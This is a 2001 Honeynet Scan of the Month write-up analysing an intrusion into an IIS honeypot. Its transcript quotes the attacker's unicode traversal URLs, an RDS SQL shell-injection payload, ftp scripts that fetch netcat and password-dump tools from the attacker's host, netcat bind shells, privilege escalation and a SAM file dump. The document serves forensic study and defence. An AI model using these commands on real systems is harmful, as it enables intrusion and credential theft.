From hulver@janes.demon.co.uk Fri Apr 20 20:30:12 2001 Date: Wed, 11 Apr 2001 21:43:12 +0100 From: y To: project@honeynet.org Subject: Scan of the month (April) submission Write up for April 2001 Honeynet Challenge of the Month. By Hulver 1. Which exploit(s) were used to attack the system. The attacker uses a combination of the MSADC/RDS exploit, and the filename canonicalization (MS-057 & MS-078) problems to compromise the server, upload files and run a remote shell. 2. How were the exploits used to gain access and control the system? The attacker requests pages normally, then uses the %c0%af hole (filename canonicalization) to request a file they should not be able to normally request (boot.ini). This is returned without problems. The attacker then uses an RDS exploit to create a file (c:\fun) which he then checks has been created using the %c0%af vuln. Then the attacker tries to create some automated ftp scripts to download files to the server. He first tries this using the RDS exploit. His first script cannot login to the intended server due to a password failure. Using the RDS exploit he then gets the Honeypot to ftp to his own machine. The connect works, so he tries to create a script that will automatically download files from his machine onto the Honeypot. Due to his own typing mistakes this fails. The first time, he creates the script incorrectly. He fails to use the right redirection type (he uses > instead of >>) so the first command in his script (open 213.116.251.162) is overwritten by his second command (johna2k). The ftp program never connects to his machine to download the correct files. He then tries again, but this time he misses the echo command from the open statement, so that command never gets written to the file. The ftp script is again not working right, because it does not open a connection to his machine. He tries again, and again he forgets the echo command of his ftp script. After failing to download files onto the Honeypot, he tries a different approach. He copies cmd.exe to cmd1.exe, and then uses the %c0%af exploit to create the ftp script. This time he gets all the commands right, and runs the script. The honeypot then connects to his machine, and downloads the following files. nc.exe pdump.exe samdump.dll As soon as the nc.exe file has been downloaded onto the honeypot, he executes it **using the %c0%af** exploit by running nc -l -p 6969 -e cmd1.exe This binds a command prompt to port 6969. As soon as this is available, he telnets into it. He has a bit of a look around the system using the command prompt then trys to run pdump.exe using the RDS exploit. He tries to do this several times, trying many different ways of running the program, but never with any luck. He gives up on this, and has a bit of a look around the server. He then runs echo Hi, i know that this is a lab server, but patch the holes! :-) >>README.NOW.Hax0r and then tries to get a list of users & sessions to a text file. This also is not very sucessfull. After a few tries, he eventually gets the IUSR_ & IWAM_ users added to the local administrators group. At 12:58:09 he tries to run pdump in his shell, this fails with Failed to open lsass: 5. Exiting. At 12:59:02 he uses the RDS exploit to try and add the user "testuser" and add it to the administrators group. At 13:00:36 he uses his shell to try and add the user "hi guy". This fails. At 13:01:36 he uses his shell to try run the command "net user himan HarHar666 /ADD" At 13:05:27 he deletes the following files that he uploaded to the system samdump.dll pdump.exe He then uses the RDS exploit to run several variations of the command rdisk -s rdisk /s while checking the \winnt\repair directory with his shell for the results. Using the RDS exploit he then runs type c:\winnt\repair\sam._ >>c:\har.txt and then using his shell, checks that the file c:\har.txt is there (it is!) He checks he can type is using his shell, and then exits. He then uses the %c0%af exploit to start the shell again on port 6969, using the nc.exe, but does not telnet into yet. He then uses the %c0%af exploit to start the shell again on port 6968 this time, using the nc.exe. He then telnets into the shell on port 6968. He copies c:\har.txt to c:\inetput\wwwroot and tries to GET it using his web browser. He then tries to delete it using his shell, but gets "Access Denied" messages. He then tries to delete it using the RDS exploit, but a dir from his shell shows it is still there. He then looks to see if drives d: e: f: g: exists, but they do not. He then tries a: b: He then exits from this shell, but uses his %c0%af exploit to attach it to the 6968 port again. Within another minute Somebody (same person?) then connects from 202.85.60.156 to the 6968 shell. This person has a look around the server before changing to the c:\ directory and running the command echo best honeypot i've seen till now :) > rfp.txt The person at 213.116.251.162 then starts requesting files using the %c0%af exploit. first \boot.ini then \READ.NOW.hax0r The person from 202.85.60.156 starts having a real good look round the server. Examining the contents of several files. They then echo test > test.txt while in c:\inetpub\wwwroot Straight after that someone (same person?) from ip address 213.116.251.162 requests the file /text.txt from the web server. They then echo this can't be true > test.txt type test.txt Then 213.116.251.162 requests the file /test.txt from the web server. We then have a sucession of ip addresses requesting /test.txt from the web server. 213.46.45.38 requests /test.txt 213.48.120.242 requests /test.txt 194.126.101.110 requests /test.txt 213.93.39.186 requests /test.txt 24.43.44.7 requests /test.txt 198.142.92.196 requests /test.txt 202.85.50.156 using the remote shell copies default.htm to default.html 213.116.251.162 then starts using %c0%af to create another ftp script. This time they upload whisker.tar.gz from the honeypot onto their own machine. 204.137.229.4 requests /test.txt from the web server. 213.116.251.162 then uses the %c0%af exploit to delete the ftp script file. 64.219.144.66 requests /test.txt from the web server. 213.64.51.77 requests /test.txt from the web server. 193.253.209.220 requests /test.txt from the web server. 4. How could this attack have been prevented? Remove the RDS functions (IE. Delete the msadc.dll file). Apply the patch from microsoft mentioned in MS00-057. Apply more restrictive NTFS ACL's. 5. How much time did you spend on this analysis and writeup? 1 hour creating tool to help read the snort log output 4/5 hours analysis & writeup. Bonus Question. Do you feel that the attacker in question knew if this was a honeypot? If so, why or why not? Yes, they knew it was a Honeypot. The echo best honeypot i've seen till now :) > rfp.txt command sort of gives that away. Nice Challenge. Love looking at them, this is my first writeup, I hope you find it as interesting reading this as I did writing it. hulver@crafty-software.co.uk ---- Appendix A. (Semi Complete transcript of all commands used during break-in). Intruder from 213.116.251.162 connects to web server at 12:25:09 and requests / 213.116.251.162 requests /guest/default.asp at 12:25:14 At 12:25:22 213.116.251.162 requests /guest/default.asp/..À¯../.../..%C0%AF../..%C0%AF../boot.ini then /guest/default.asp/..À¯../..À¯../..%AF../..%C0%AF../boot.ini then /guest/default.asp/..À¯../..À¯../..À¯../boot.ini then /guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../boot.ini This is sucessfull and returns the boot.ini file. At 12:26:35 the user from 213.116.251.162 requests /msadc/ from the web server, but gets a 403 - Access Forbidden. At 12:26:49 They then try /msadc/msadcs.dll and get an Ok response. At 12:27:08 They then exploit the RDS hole to run the following SQL query. Select * from Customers where City='|shell("cmd /c echo werd >> c:\fun")|'.².driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb; This is most likely an automated tool, as the MIME boundary is !ADM!ROX!YOUR!WORLD! As used by Rain Forest Puppy's own exploit script. At 12:27:15 the following GETs are sent to the server /guest/default.asp/..À¯../..À¯../..%AF../..%C0%AF../fun /guest/default.asp/..À¯../..À¯../..À¯../fun /guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../fun /guest/default.asp/..À¯../.../..%C0%AF../..%C0%AF../fun The web server the returns werd This tells the attacker that the RDS exploit was succesfull. Ok. It's 12:32:50 and the attacker has had a bit of a think. They then use the RDS exploit to send the following commands to the server. echo user johna2k > ftpcom echo hacker2000 >> ftpcom echo get samdump.dll >> ftpcom echo get pdump.exe >> ftpcom echo get nc.exe >> ftpcom echo quit >> ftpcom ftp -s:ftpcom -n www.nether.net At 12:33:34 the honeypot attempts to run the script. 220 freenet.nether.net FTP server (SunOS 5.7) ready. USER johna2k 331 Password required for johna2k. PASS hacker2000 530 Login incorrect. PORT 172,16,1,106,12,64 530 Please login with USER and PASS. RETR samdump.dll 530 Please login with USER and PASS. RETR pdump.exe 530 Please login with USER and PASS. RETR nc.exe 530 Please login with USER and PASS. QUIT 221 Goodbye. This has not worked, the password was incorrect. At 12:33:51 the attacker then runs the following command using the RDS exploit. cmd /c pdump.exe >> new.pass At 12:34:01 the following commands are run using the RDS exploit. echo user johna2k > ftpcom2 echo hacker2000 >> ftpcom2 put new.pass >> ftpcom2 echo quit >> ftpcom2 ftp -s:ftpcom2 -n www.nether.net at 12:24:30 the Honeypot attempts to connect to www.nether.net, with the following results. 220 freenet.nether.net FTP server (SunOS 5.7) ready. USER johna2k 331 Password required for johna2k. PASS hacker2000 530 Login incorrect. QUIT 221 Goodbye. Note that the Intruder made a mistake in their commands above. Even if they had been able to log into the ftp server they missed the echo on their command, so the put new.pass was not in the ftpcom2 file. The intuder then sends the command ftp 213.116.251.162 The honeypot server does this. 220-Serv-U FTP-Server v2.5h for WinSock ready... 220--------H-A-C-K T-H-E P-L-A-N-E-T-------- 220-W3|_c0m3 T0 JohnA's 0d4y Ef-Tee-Pee S3rv3r. 220-Featuring 100% elite hax0r warez!@$#@ 220-Im running win 95 (Release candidate 1), on a p33, with 16mb Ram. 220 -------H-A-C-K T-H-E P-L-A-N-E-T-------- Note. This is the Intruders own machine. So he is able to check if the Honeypot has indeed run his command. Perhaps he is wondering if some if his earlier commands had run. At 12:36:37 He then uses the RDS exploit to send the following commands to the honeypot. Note the first command is usless. As the second command overwrites the file "ftpcom" again. echo open 213.116.251.162 > ftpcom echo johna2k > ftpcom echo hacker2000 >> ftpcom echo get samdump.dll >> ftpcom echo get pdump.exe >> ftpcom echo get nc.exe >> ftpcom echo quit >> ftpcom ftp -s:ftpcom At 12:38:27 he sends some more commands to the Honeypot. Maybe he's wondering why his first script didn't work. (Remember the commands he sent during his last try overwrote the first command, so the open 213.116.251.162 never made it to the ftp client). Whoops, looks like he forgot the echo & >sasfile part on the first command. open 212.139.12.26 echo johna2k >>sasfile echo haxedj00 >>sasfile echo get pdump.exe >>sasfile echo get samdump.dll >>sasfile echo get nc.exe >>sasfile echo quit >>sasfile ftp -s:sasfile Right. So that won't have worked. Once again our eleet haxor has messed up his script file. Just 2 seconds later, he trys again, sending some more commands to the honeypot using the RDS exploit. open 213.116.251.162 echo johna2k >>sasfile echo haxedj00 >>sasfile echo get pdump.exe >>sasfile echo get samdump.dll >>sasfile echo get nc.exe >>sasfile echo quit >>sasfile ftp -s:sasfile Reminding me of those people who dial a wrong number, then just hit redial in an attempt to get the right number, this Intruder sends the same commands again. He must be getting frustrated now. So he starts down a different track. At 12:40:03 he starts sending commands to the server using the encoded urls, instead of the RDS exploit. copy+C:\winnt\system32\cmd.exe cmd1.exe We then see the Honeypot respond with The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: 1 file(s) copied. He then uses this cmd1.exe to run some more commands using the %c0%af url exploit. echo open 213.116.251.162 >ftpcom echo johna2k >>ftpcom echo haxedj00 >>ftpcom echo get nc.exe >>ftpcom echo get pdump.exe >>ftpcom echo get samdump.dll >>ftpcom echo quit >>ftpcom ftp -s:ftpcom This time he has issued the open command sucessfully, so will it work this time? Lets look at the Honeypots conversation with the intruders ftp server. The connection starts at 12:42:22 220-Serv-U FTP-Server v2.5h for WinSock ready... 220--------H-A-C-K T-H-E P-L-A-N-E-T-------- 220-W3|_c0m3 T0 JohnA's 0d4y Ef-Tee-Pee S3rv3r. 220-Featuring 100% elite hax0r warez!@$#@ 220-Im running win 95 (Release candidate 1), on a p33, with 16mb Ram. 220 -------H-A-C-K T-H-E P-L-A-N-E-T-------- USER johna2k 331 User name okay, need password. PASS haxedj00 230 User logged in, proceed. PORT 172,16,1,106,12,71 200 PORT Command successful. RETR nc.exe 150 Opening ASCII mode data connection for nc.exe (59392 bytes). 226 Transfer complete. PORT 172,16,1,106,12,72 RETR pdump.exe 150 Opening ASCII mode data connection for pdump.exe (32768 bytes). 226 Transfer complete. PORT 172,16,1,106,12,73 200 PORT Command successful. RETR samdump.dll 150 Opening ASCII mode data connection for samdump.dll (36864 bytes). 226 Transfer complete. QUIT 221 Buh bye, you secksi hax0r j00 :] As soon as the Honeypot has downloaded nc.exe, the intruder dosn't wait for the rest of the download to complete, they just start running nc.exe. They issue the following command to the Honeypot via the %c0%af exploit. nc -l -p 6969 -e cmd1.exe OK. That worked. The intruder now has nc running cmd1.exe bound to port 6969. At 12:43:30 The intruder then telnets into the server on port 6969 and starts having a look around. C:\>dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\Program Files\Common Files\system\msadc 02/04/01 06:41a . 02/04/01 06:41a .. 09/25/97 07:41a 596 adcjavas.inc 09/25/97 07:41a 589 adcvbs.inc 04/30/97 11:00p 208,144 cmd1.exe 02/04/01 06:41a 98 ftpcom 09/25/97 08:28a 172,816 msadce.dll 09/25/97 08:16a 5,632 msadcer.dll 09/25/97 08:24a 23,312 msadcf.dll 09/25/97 08:24a 91,408 msadco.dll 09/25/97 08:19a 5,120 msadcor.dll 09/26/97 08:19a 42,256 msadcs.dll 02/04/01 06:41a 59,392 nc.exe 02/04/01 06:41a 32,768 pdump.exe 10/02/97 07:28a 19,388 readme.txt 02/04/01 06:41a 36,864 samdump.dll 16 File(s) 698,383 bytes 1,690,861,056 bytes free The intruder then uses the RDS exploit to run C:\Program Files\Common Files\system\msadc\pdump.exe >>yay.txt Then, on his remote shell, he runs C:\>dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\Program Files\Common Files\system\msadc 02/04/01 06:41a . 02/04/01 06:41a .. 09/25/97 07:41a 596 adcjavas.inc 09/25/97 07:41a 589 adcvbs.inc 04/30/97 11:00p 208,144 cmd1.exe 02/04/01 06:41a 98 ftpcom 09/25/97 08:28a 172,816 msadce.dll 09/25/97 08:16a 5,632 msadcer.dll 09/25/97 08:24a 23,312 msadcf.dll 09/25/97 08:24a 91,408 msadco.dll 09/25/97 08:19a 5,120 msadcor.dll 09/26/97 08:19a 42,256 msadcs.dll 02/04/01 06:41a 59,392 nc.exe 02/04/01 06:41a 32,768 pdump.exe 10/02/97 07:28a 19,388 readme.txt 02/04/01 06:41a 36,864 samdump.dll 16 File(s) 698,383 bytes 1,690,861,056 bytes free Looks like the pdump command didn't work. He then types the following commands C:\>[Adir The name specified is not recognized as an internal or external command, operable program or batch file. (Looks like he tried to press up-arrow to recall the last command). C:\>dir (Still no yay.txt showing up) C:\>del ftpcom C:\>ls (Whoops, looks like somebody has been using U*ix too much) C:\>dir (Still not yay.txt showing up) C:\>type readme.e The system cannot find the file specified. He then posts another command via the RDS exploit. C:\Program Files\Common Files\system\msadc\pdump.exe >> c:\yay.txt Then, using the nc shell, he goes looking for the results. C:\>c:. The filename, directory name, or volume label syntax is incorrect. C:\>cd\ C:\>dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 06:26a 7 fun 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 12/21/00 08:59p TEMP 02/04/01 06:42a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 14 File(s) 78,643,529 bytes 1,690,861,056 bytes free C:\>rm .. The name specified is not recognized as an internal or external command, operable program or batch file. C:\>del fun C:\>dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 12/21/00 08:59p TEMP 02/04/01 06:42a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 13 File(s) 78,643,522 bytes 1,690,861,056 bytes free C:\>cd exploites The system cannot find the path specified. C:\>dir C:\>cd exploits C:\>dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits 12/26/00 07:36p . 12/26/00 07:36p .. 12/26/00 07:36p microsoft 12/26/00 07:35p newfiles 12/26/00 07:24p unix 5 File(s) 0 bytes 1,690,861,056 bytes free C:\>cd microsoft C:\>dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits\microsoft 12/26/00 07:36p . 12/26/00 07:36p ..11/05/97 09:46a 87,312 95sscrk.zip 08/15/00 02:06p 734 ac.zip 08/12/98 09:46a 9,417 anger.tar.gz 5 File(s) 97,463 bytes 1,690,861,056 bytes free C:\>cd .. C:\>cd newfiles C:\>dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits\newfiles 12/26/00 07:35p . 12/26/00 07:35p .. 2 File(s) 0 bytes 1,690,861,056 bytes free C:\>cd .. C:\>cd unix C:\>dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits\unix 12/26/00 07:24p . 12/26/00 07:24p .. 12/26/00 07:25p sunos-exploits 12/26/00 07:24p tcp-exploits 12/26/00 07:24p trojans 12/26/00 07:16p udp-exploits 12/26/00 07:15p ultrix-exploits 12/26/00 07:15p xwin-exploits 8 File(s) 0 bytes 1,690,861,056 bytes free C:\>cd .. C:\>dir C:\>cd .. C:\>dir Now he posts another command via the RDS exploit. C:\>pdump.exe >> c:\yay.txt Then using his nc shell, goes looking for the results. C:\>dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 12/21/00 08:59p TEMP 02/04/01 06:44a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 13 File(s) 78,643,522 bytes 1,690,861,056 bytes free Still nothing there, try again C:\>dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 12/21/00 08:59p TEMP 02/04/01 06:44a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 13 File(s) 78,643,522 bytes 1,690,861,056 bytes free C:\>cat yay The name specified is not recognized as an internal or external command, operable program or batch file. C:\>type yay. The system cannot find the file specified. C:\>type yay.txt (The file is empty) C:\>net session System error 5 has occurred. Access is denied. (Whoops, we are running as the IUSR_ account in this shell, no access to stuff like that, if only he had bound his shell using the RDS exploit) C:\>net users User accounts for \\ ------------------------------------------------------------------------------- Administrator Guest IUSR_KENNY IWAM_KENNY The command completed with one or more errors. At 12:47:48 he posts another command via RDS. C:\>net session >>yay2.txt He then checks the directory list, and sees that the file yay2 has been created, and contains some text. So he examines this. C:\>type yay2.txt There are no entries in the list. He then deletes this file and runs C:\>net session >>yay3.txt System error 5 has occurred. Access is denied. After another mistyped command, he then tries to delete some more files. C:\>del yay* C:\yay.txt The process cannot access the file because it is being used by another process. C:\>del yay3.txt Could Not Find C:\yay3.txt C:\>dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 12/21/00 08:59p TEMP 02/04/01 06:46a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 13 File(s) 78,643,522 bytes 1,690,861,056 bytes free He then posts another command via the RDS exploit. net users >>heh.txt Using his nc shell, he does a directory, and the heh.txt file is there. He types some more commands. C:\>yuper The name specified is not recognized as an internal or external command, operable program or batch file. C:\>type heh.txt User accounts for \\ ------------------------------------------------------------------------------- Administrator Guest IUSR_KENNY IWAM_KENNY The command completed with one or more errors. C:\>del heh.txt C:\>cd program files C:\>dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\Program Files 12/21/00 08:59p . 12/21/00 08:59p .. 12/07/00 03:11p Common Files 12/21/00 08:59p D4 12/07/00 03:23p ICW-Internet Connection Wizard 12/07/00 03:37p Microsoft FrontPage 12/07/00 03:34p Mts 12/07/00 03:23p Outlook Express 11/26/00 06:42p Plus! 12/16/00 06:54p Syslogd 11/26/00 06:56p Windows NT 11 File(s) 0 bytes 1,690,861,056 bytes free C:\>cd .. C:\>echo Hi, i know that this is a lab server, but patch the holes! :-) >>README.NOW.Hax0r C:\>dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 12/21/00 08:59p TEMP 02/04/01 06:48a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 14 File(s) 78,643,591 bytes 1,690,861,056 bytes free C:\>net group Group Accounts for \\ ------------------------------------------------------------------------------- *Domain Admins *Domain Guests *Domain Users The command completed with one or more errors. C:\>net localgroup System error 1312 has occurred. A specified logon session does not exist. It may already have been terminated. C:\>net group domain admins The syntax of this command is: NET GROUP [groupname [/COMMENT:"text"]] [/DOMAIN] groupname {/ADD [/COMMENT:"text"] | /DELETE} [/DOMAIN] groupname username [...] {/ADD | /DELETE} [/DOMAIN] C:\>[Anet group /? The name specified is not recognized as an internal or external command, operable program or batch file. C:\>net group ?? The syntax of this command is: NET GROUP [groupname [/COMMENT:"text"]] [/DOMAIN] groupname {/ADD [/COMMENT:"text"] | /DELETE} [/DOMAIN] groupname username [...] {/ADD | /DELETE} [/DOMAIN] C:\>net group /? The syntax of this command is: NET GROUP [groupname [/COMMENT:"text"]] [/DOMAIN] groupname {/ADD [/COMMENT:"text"] | /DELETE} [/DOMAIN] groupname username [...] {/ADD | /DELETE} [/DOMAIN] C:\>net group Group Accounts for \\ ------------------------------------------------------------------------------- *Domain Admins *Domain Guests *Domain Users The command completed with one or more errors. C:\>net localgroup System error 1312 has occurred. A specified logon session does not exist. It may already have been terminated. C:\>net localgroup /domain admins System error 1312 has occurred. A specified logon session does not exist. It may already have been terminated. C:\>net localgroup domain admins The syntax of this command is: NET LOCALGROUP [groupname [/COMMENT:"text"]] [/DOMAIN] groupname {/ADD [/COMMENT:"text"] | /DELETE} [/DOMAIN] groupname name [...] {/ADD | /DELETE} [/DOMAIN] C:\>net users User accounts for \\ ------------------------------------------------------------------------------- Administrator Guest IUSR_KENNY IWAM_KENNY The command completed with one or more errors. After this unsucessfull attempt at something, the intruder then goes back to issueing commands via the RDS exploit net localgroup Domain Admins IWAM_KENNY /ADD net localgroup Domain Admins IUSR_KENNY /ADD Then, back to his nc shell. C:\>net session System error 5 has occurred. Access is denied. C:\>[A[A[Anet localgroup domain admins The name specified is not recognized as an internal or external command, operable program or batch file. C:\>net group domain admins The syntax of this command is: NET GROUP [groupname [/COMMENT:"text"]] [/DOMAIN] groupname {/ADD [/COMMENT:"text"] | /DELETE} [/DOMAIN] groupname username [...] {/ADD | /DELETE} [/DOMAIN] C:\>net localgroup administrators Alias name administrators Comment Members can fully administer the computer/domain Members ------------------------------------------------------------------------------- Administrator Domain Admins The command completed successfully. Then, back to the RDS exploit he goes. net localgroup administrators IUSR_KENNY /ADD net localgroup administrators IWAM_KENNY /ADD Then, back to the nc shell. C:\>[Anet localgroup administrators The name specified is not recognized as an internal or external command, operable program or batch file. C:\>net localgroup administrators Alias name administrators Comment Members can fully administer the computer/domain Members ------------------------------------------------------------------------------- Administrator Domain Admins IUSR_KENNY IWAM_KENNY The command completed successfully. Sucess. It is now 12:56:38, and the Intruder has (finally) managed to add the IUSR_ accounts to the administrators group. [snip I'm giving up documenting his every keystroke, as it is taking too long. This is copied from the answers above, so if you've read that, there is nothing new here.] At 12:58:09 he tries to run pdump in his shell, this fails with Failed to open lsass: 5. Exiting. At 12:59:02 he uses the RDS exploit to try and add the user "testuser" and add it to the administrators group. At 13:00:36 he uses his shell to try and add the user "hi guy". This fails. At 13:01:36 he uses his shell to try run the command "net user himan HarHar666 /ADD" At 13:05:27 he deletes the following files that he uploaded to the system samdump.dll pdump.exe He then uses the RDS exploit to run several variations of the command rdisk -s rdisk /s while checking the \winnt\repair directory with his shell for the results. Using the RDS exploit he then runs type c:\winnt\repair\sam._ >>c:\har.txt and then using his shell, checks that the file c:\har.txt is there (it is!) He checks he can type is using his shell, and then exits. He then uses the %c0%af exploit to start the shell again on port 6969, using the nc.exe, but does not telnet into yet. He then uses the %c0%af exploit to start the shell again on port 6968 this time, using the nc.exe. He then telnets into the shell on port 6968. He copies c:\har.txt to c:\inetput\wwwroot and tries to GET it using his web browser. He then tries to delete it using his shell, but gets "Access Denied" messages. He then tries to delete it using the RDS exploit, but a dir from his shell shows it is still there. He then looks to see if drives d: e: f: g: exists, but they do not. He then tries a: b: He then exits from this shell, but uses his %c0%af exploit to attach it to the 6968 port again. Within another minute Somebody (same person?) then connects from 202.85.60.156 to the 6968 shell. This person has a look around the server before changing to the c:\ directory and running the command echo best honeypot i've seen till now :) > rfp.txt The person at 213.116.251.162 then starts requesting files using the %c0%af exploit. first \boot.ini then \READ.NOW.hax0r The person from 202.85.60.156 starts having a real good look round the server. Examining the contents of several files. They then echo test > test.txt while in c:\inetpub\wwwroot Straight after that someone (same person?) from ip address 213.116.251.162 requests the file /text.txt from the web server. They then echo this can't be true > test.txt type test.txt Then 213.116.251.162 requests the file /test.txt from the web server. We then have a sucession of people requesting /test.txt from the web server. 213.46.45.38 requests /test.txt 213.48.120.242 requests /test.txt 194.126.101.110 requests /test.txt 213.93.39.186 requests /test.txt 24.43.44.7 requests /test.txt 198.142.92.196 requests /test.txt 202.85.50.156 using the remote shell copies default.htm to default.html 213.116.251.162 then starts using %c0%af to create another ftp script. This time they upload whisker.tar.gz from the honeypot onto their own machine. 204.137.229.4 requests /test.txt from the web server. 213.116.251.162 then uses the %c0%af exploit to delete the ftp script file. 64.219.144.66 requests /test.txt from the web server. 213.64.51.77 requests /test.txt from the web server. 193.253.209.220 requests /test.txt from the web server.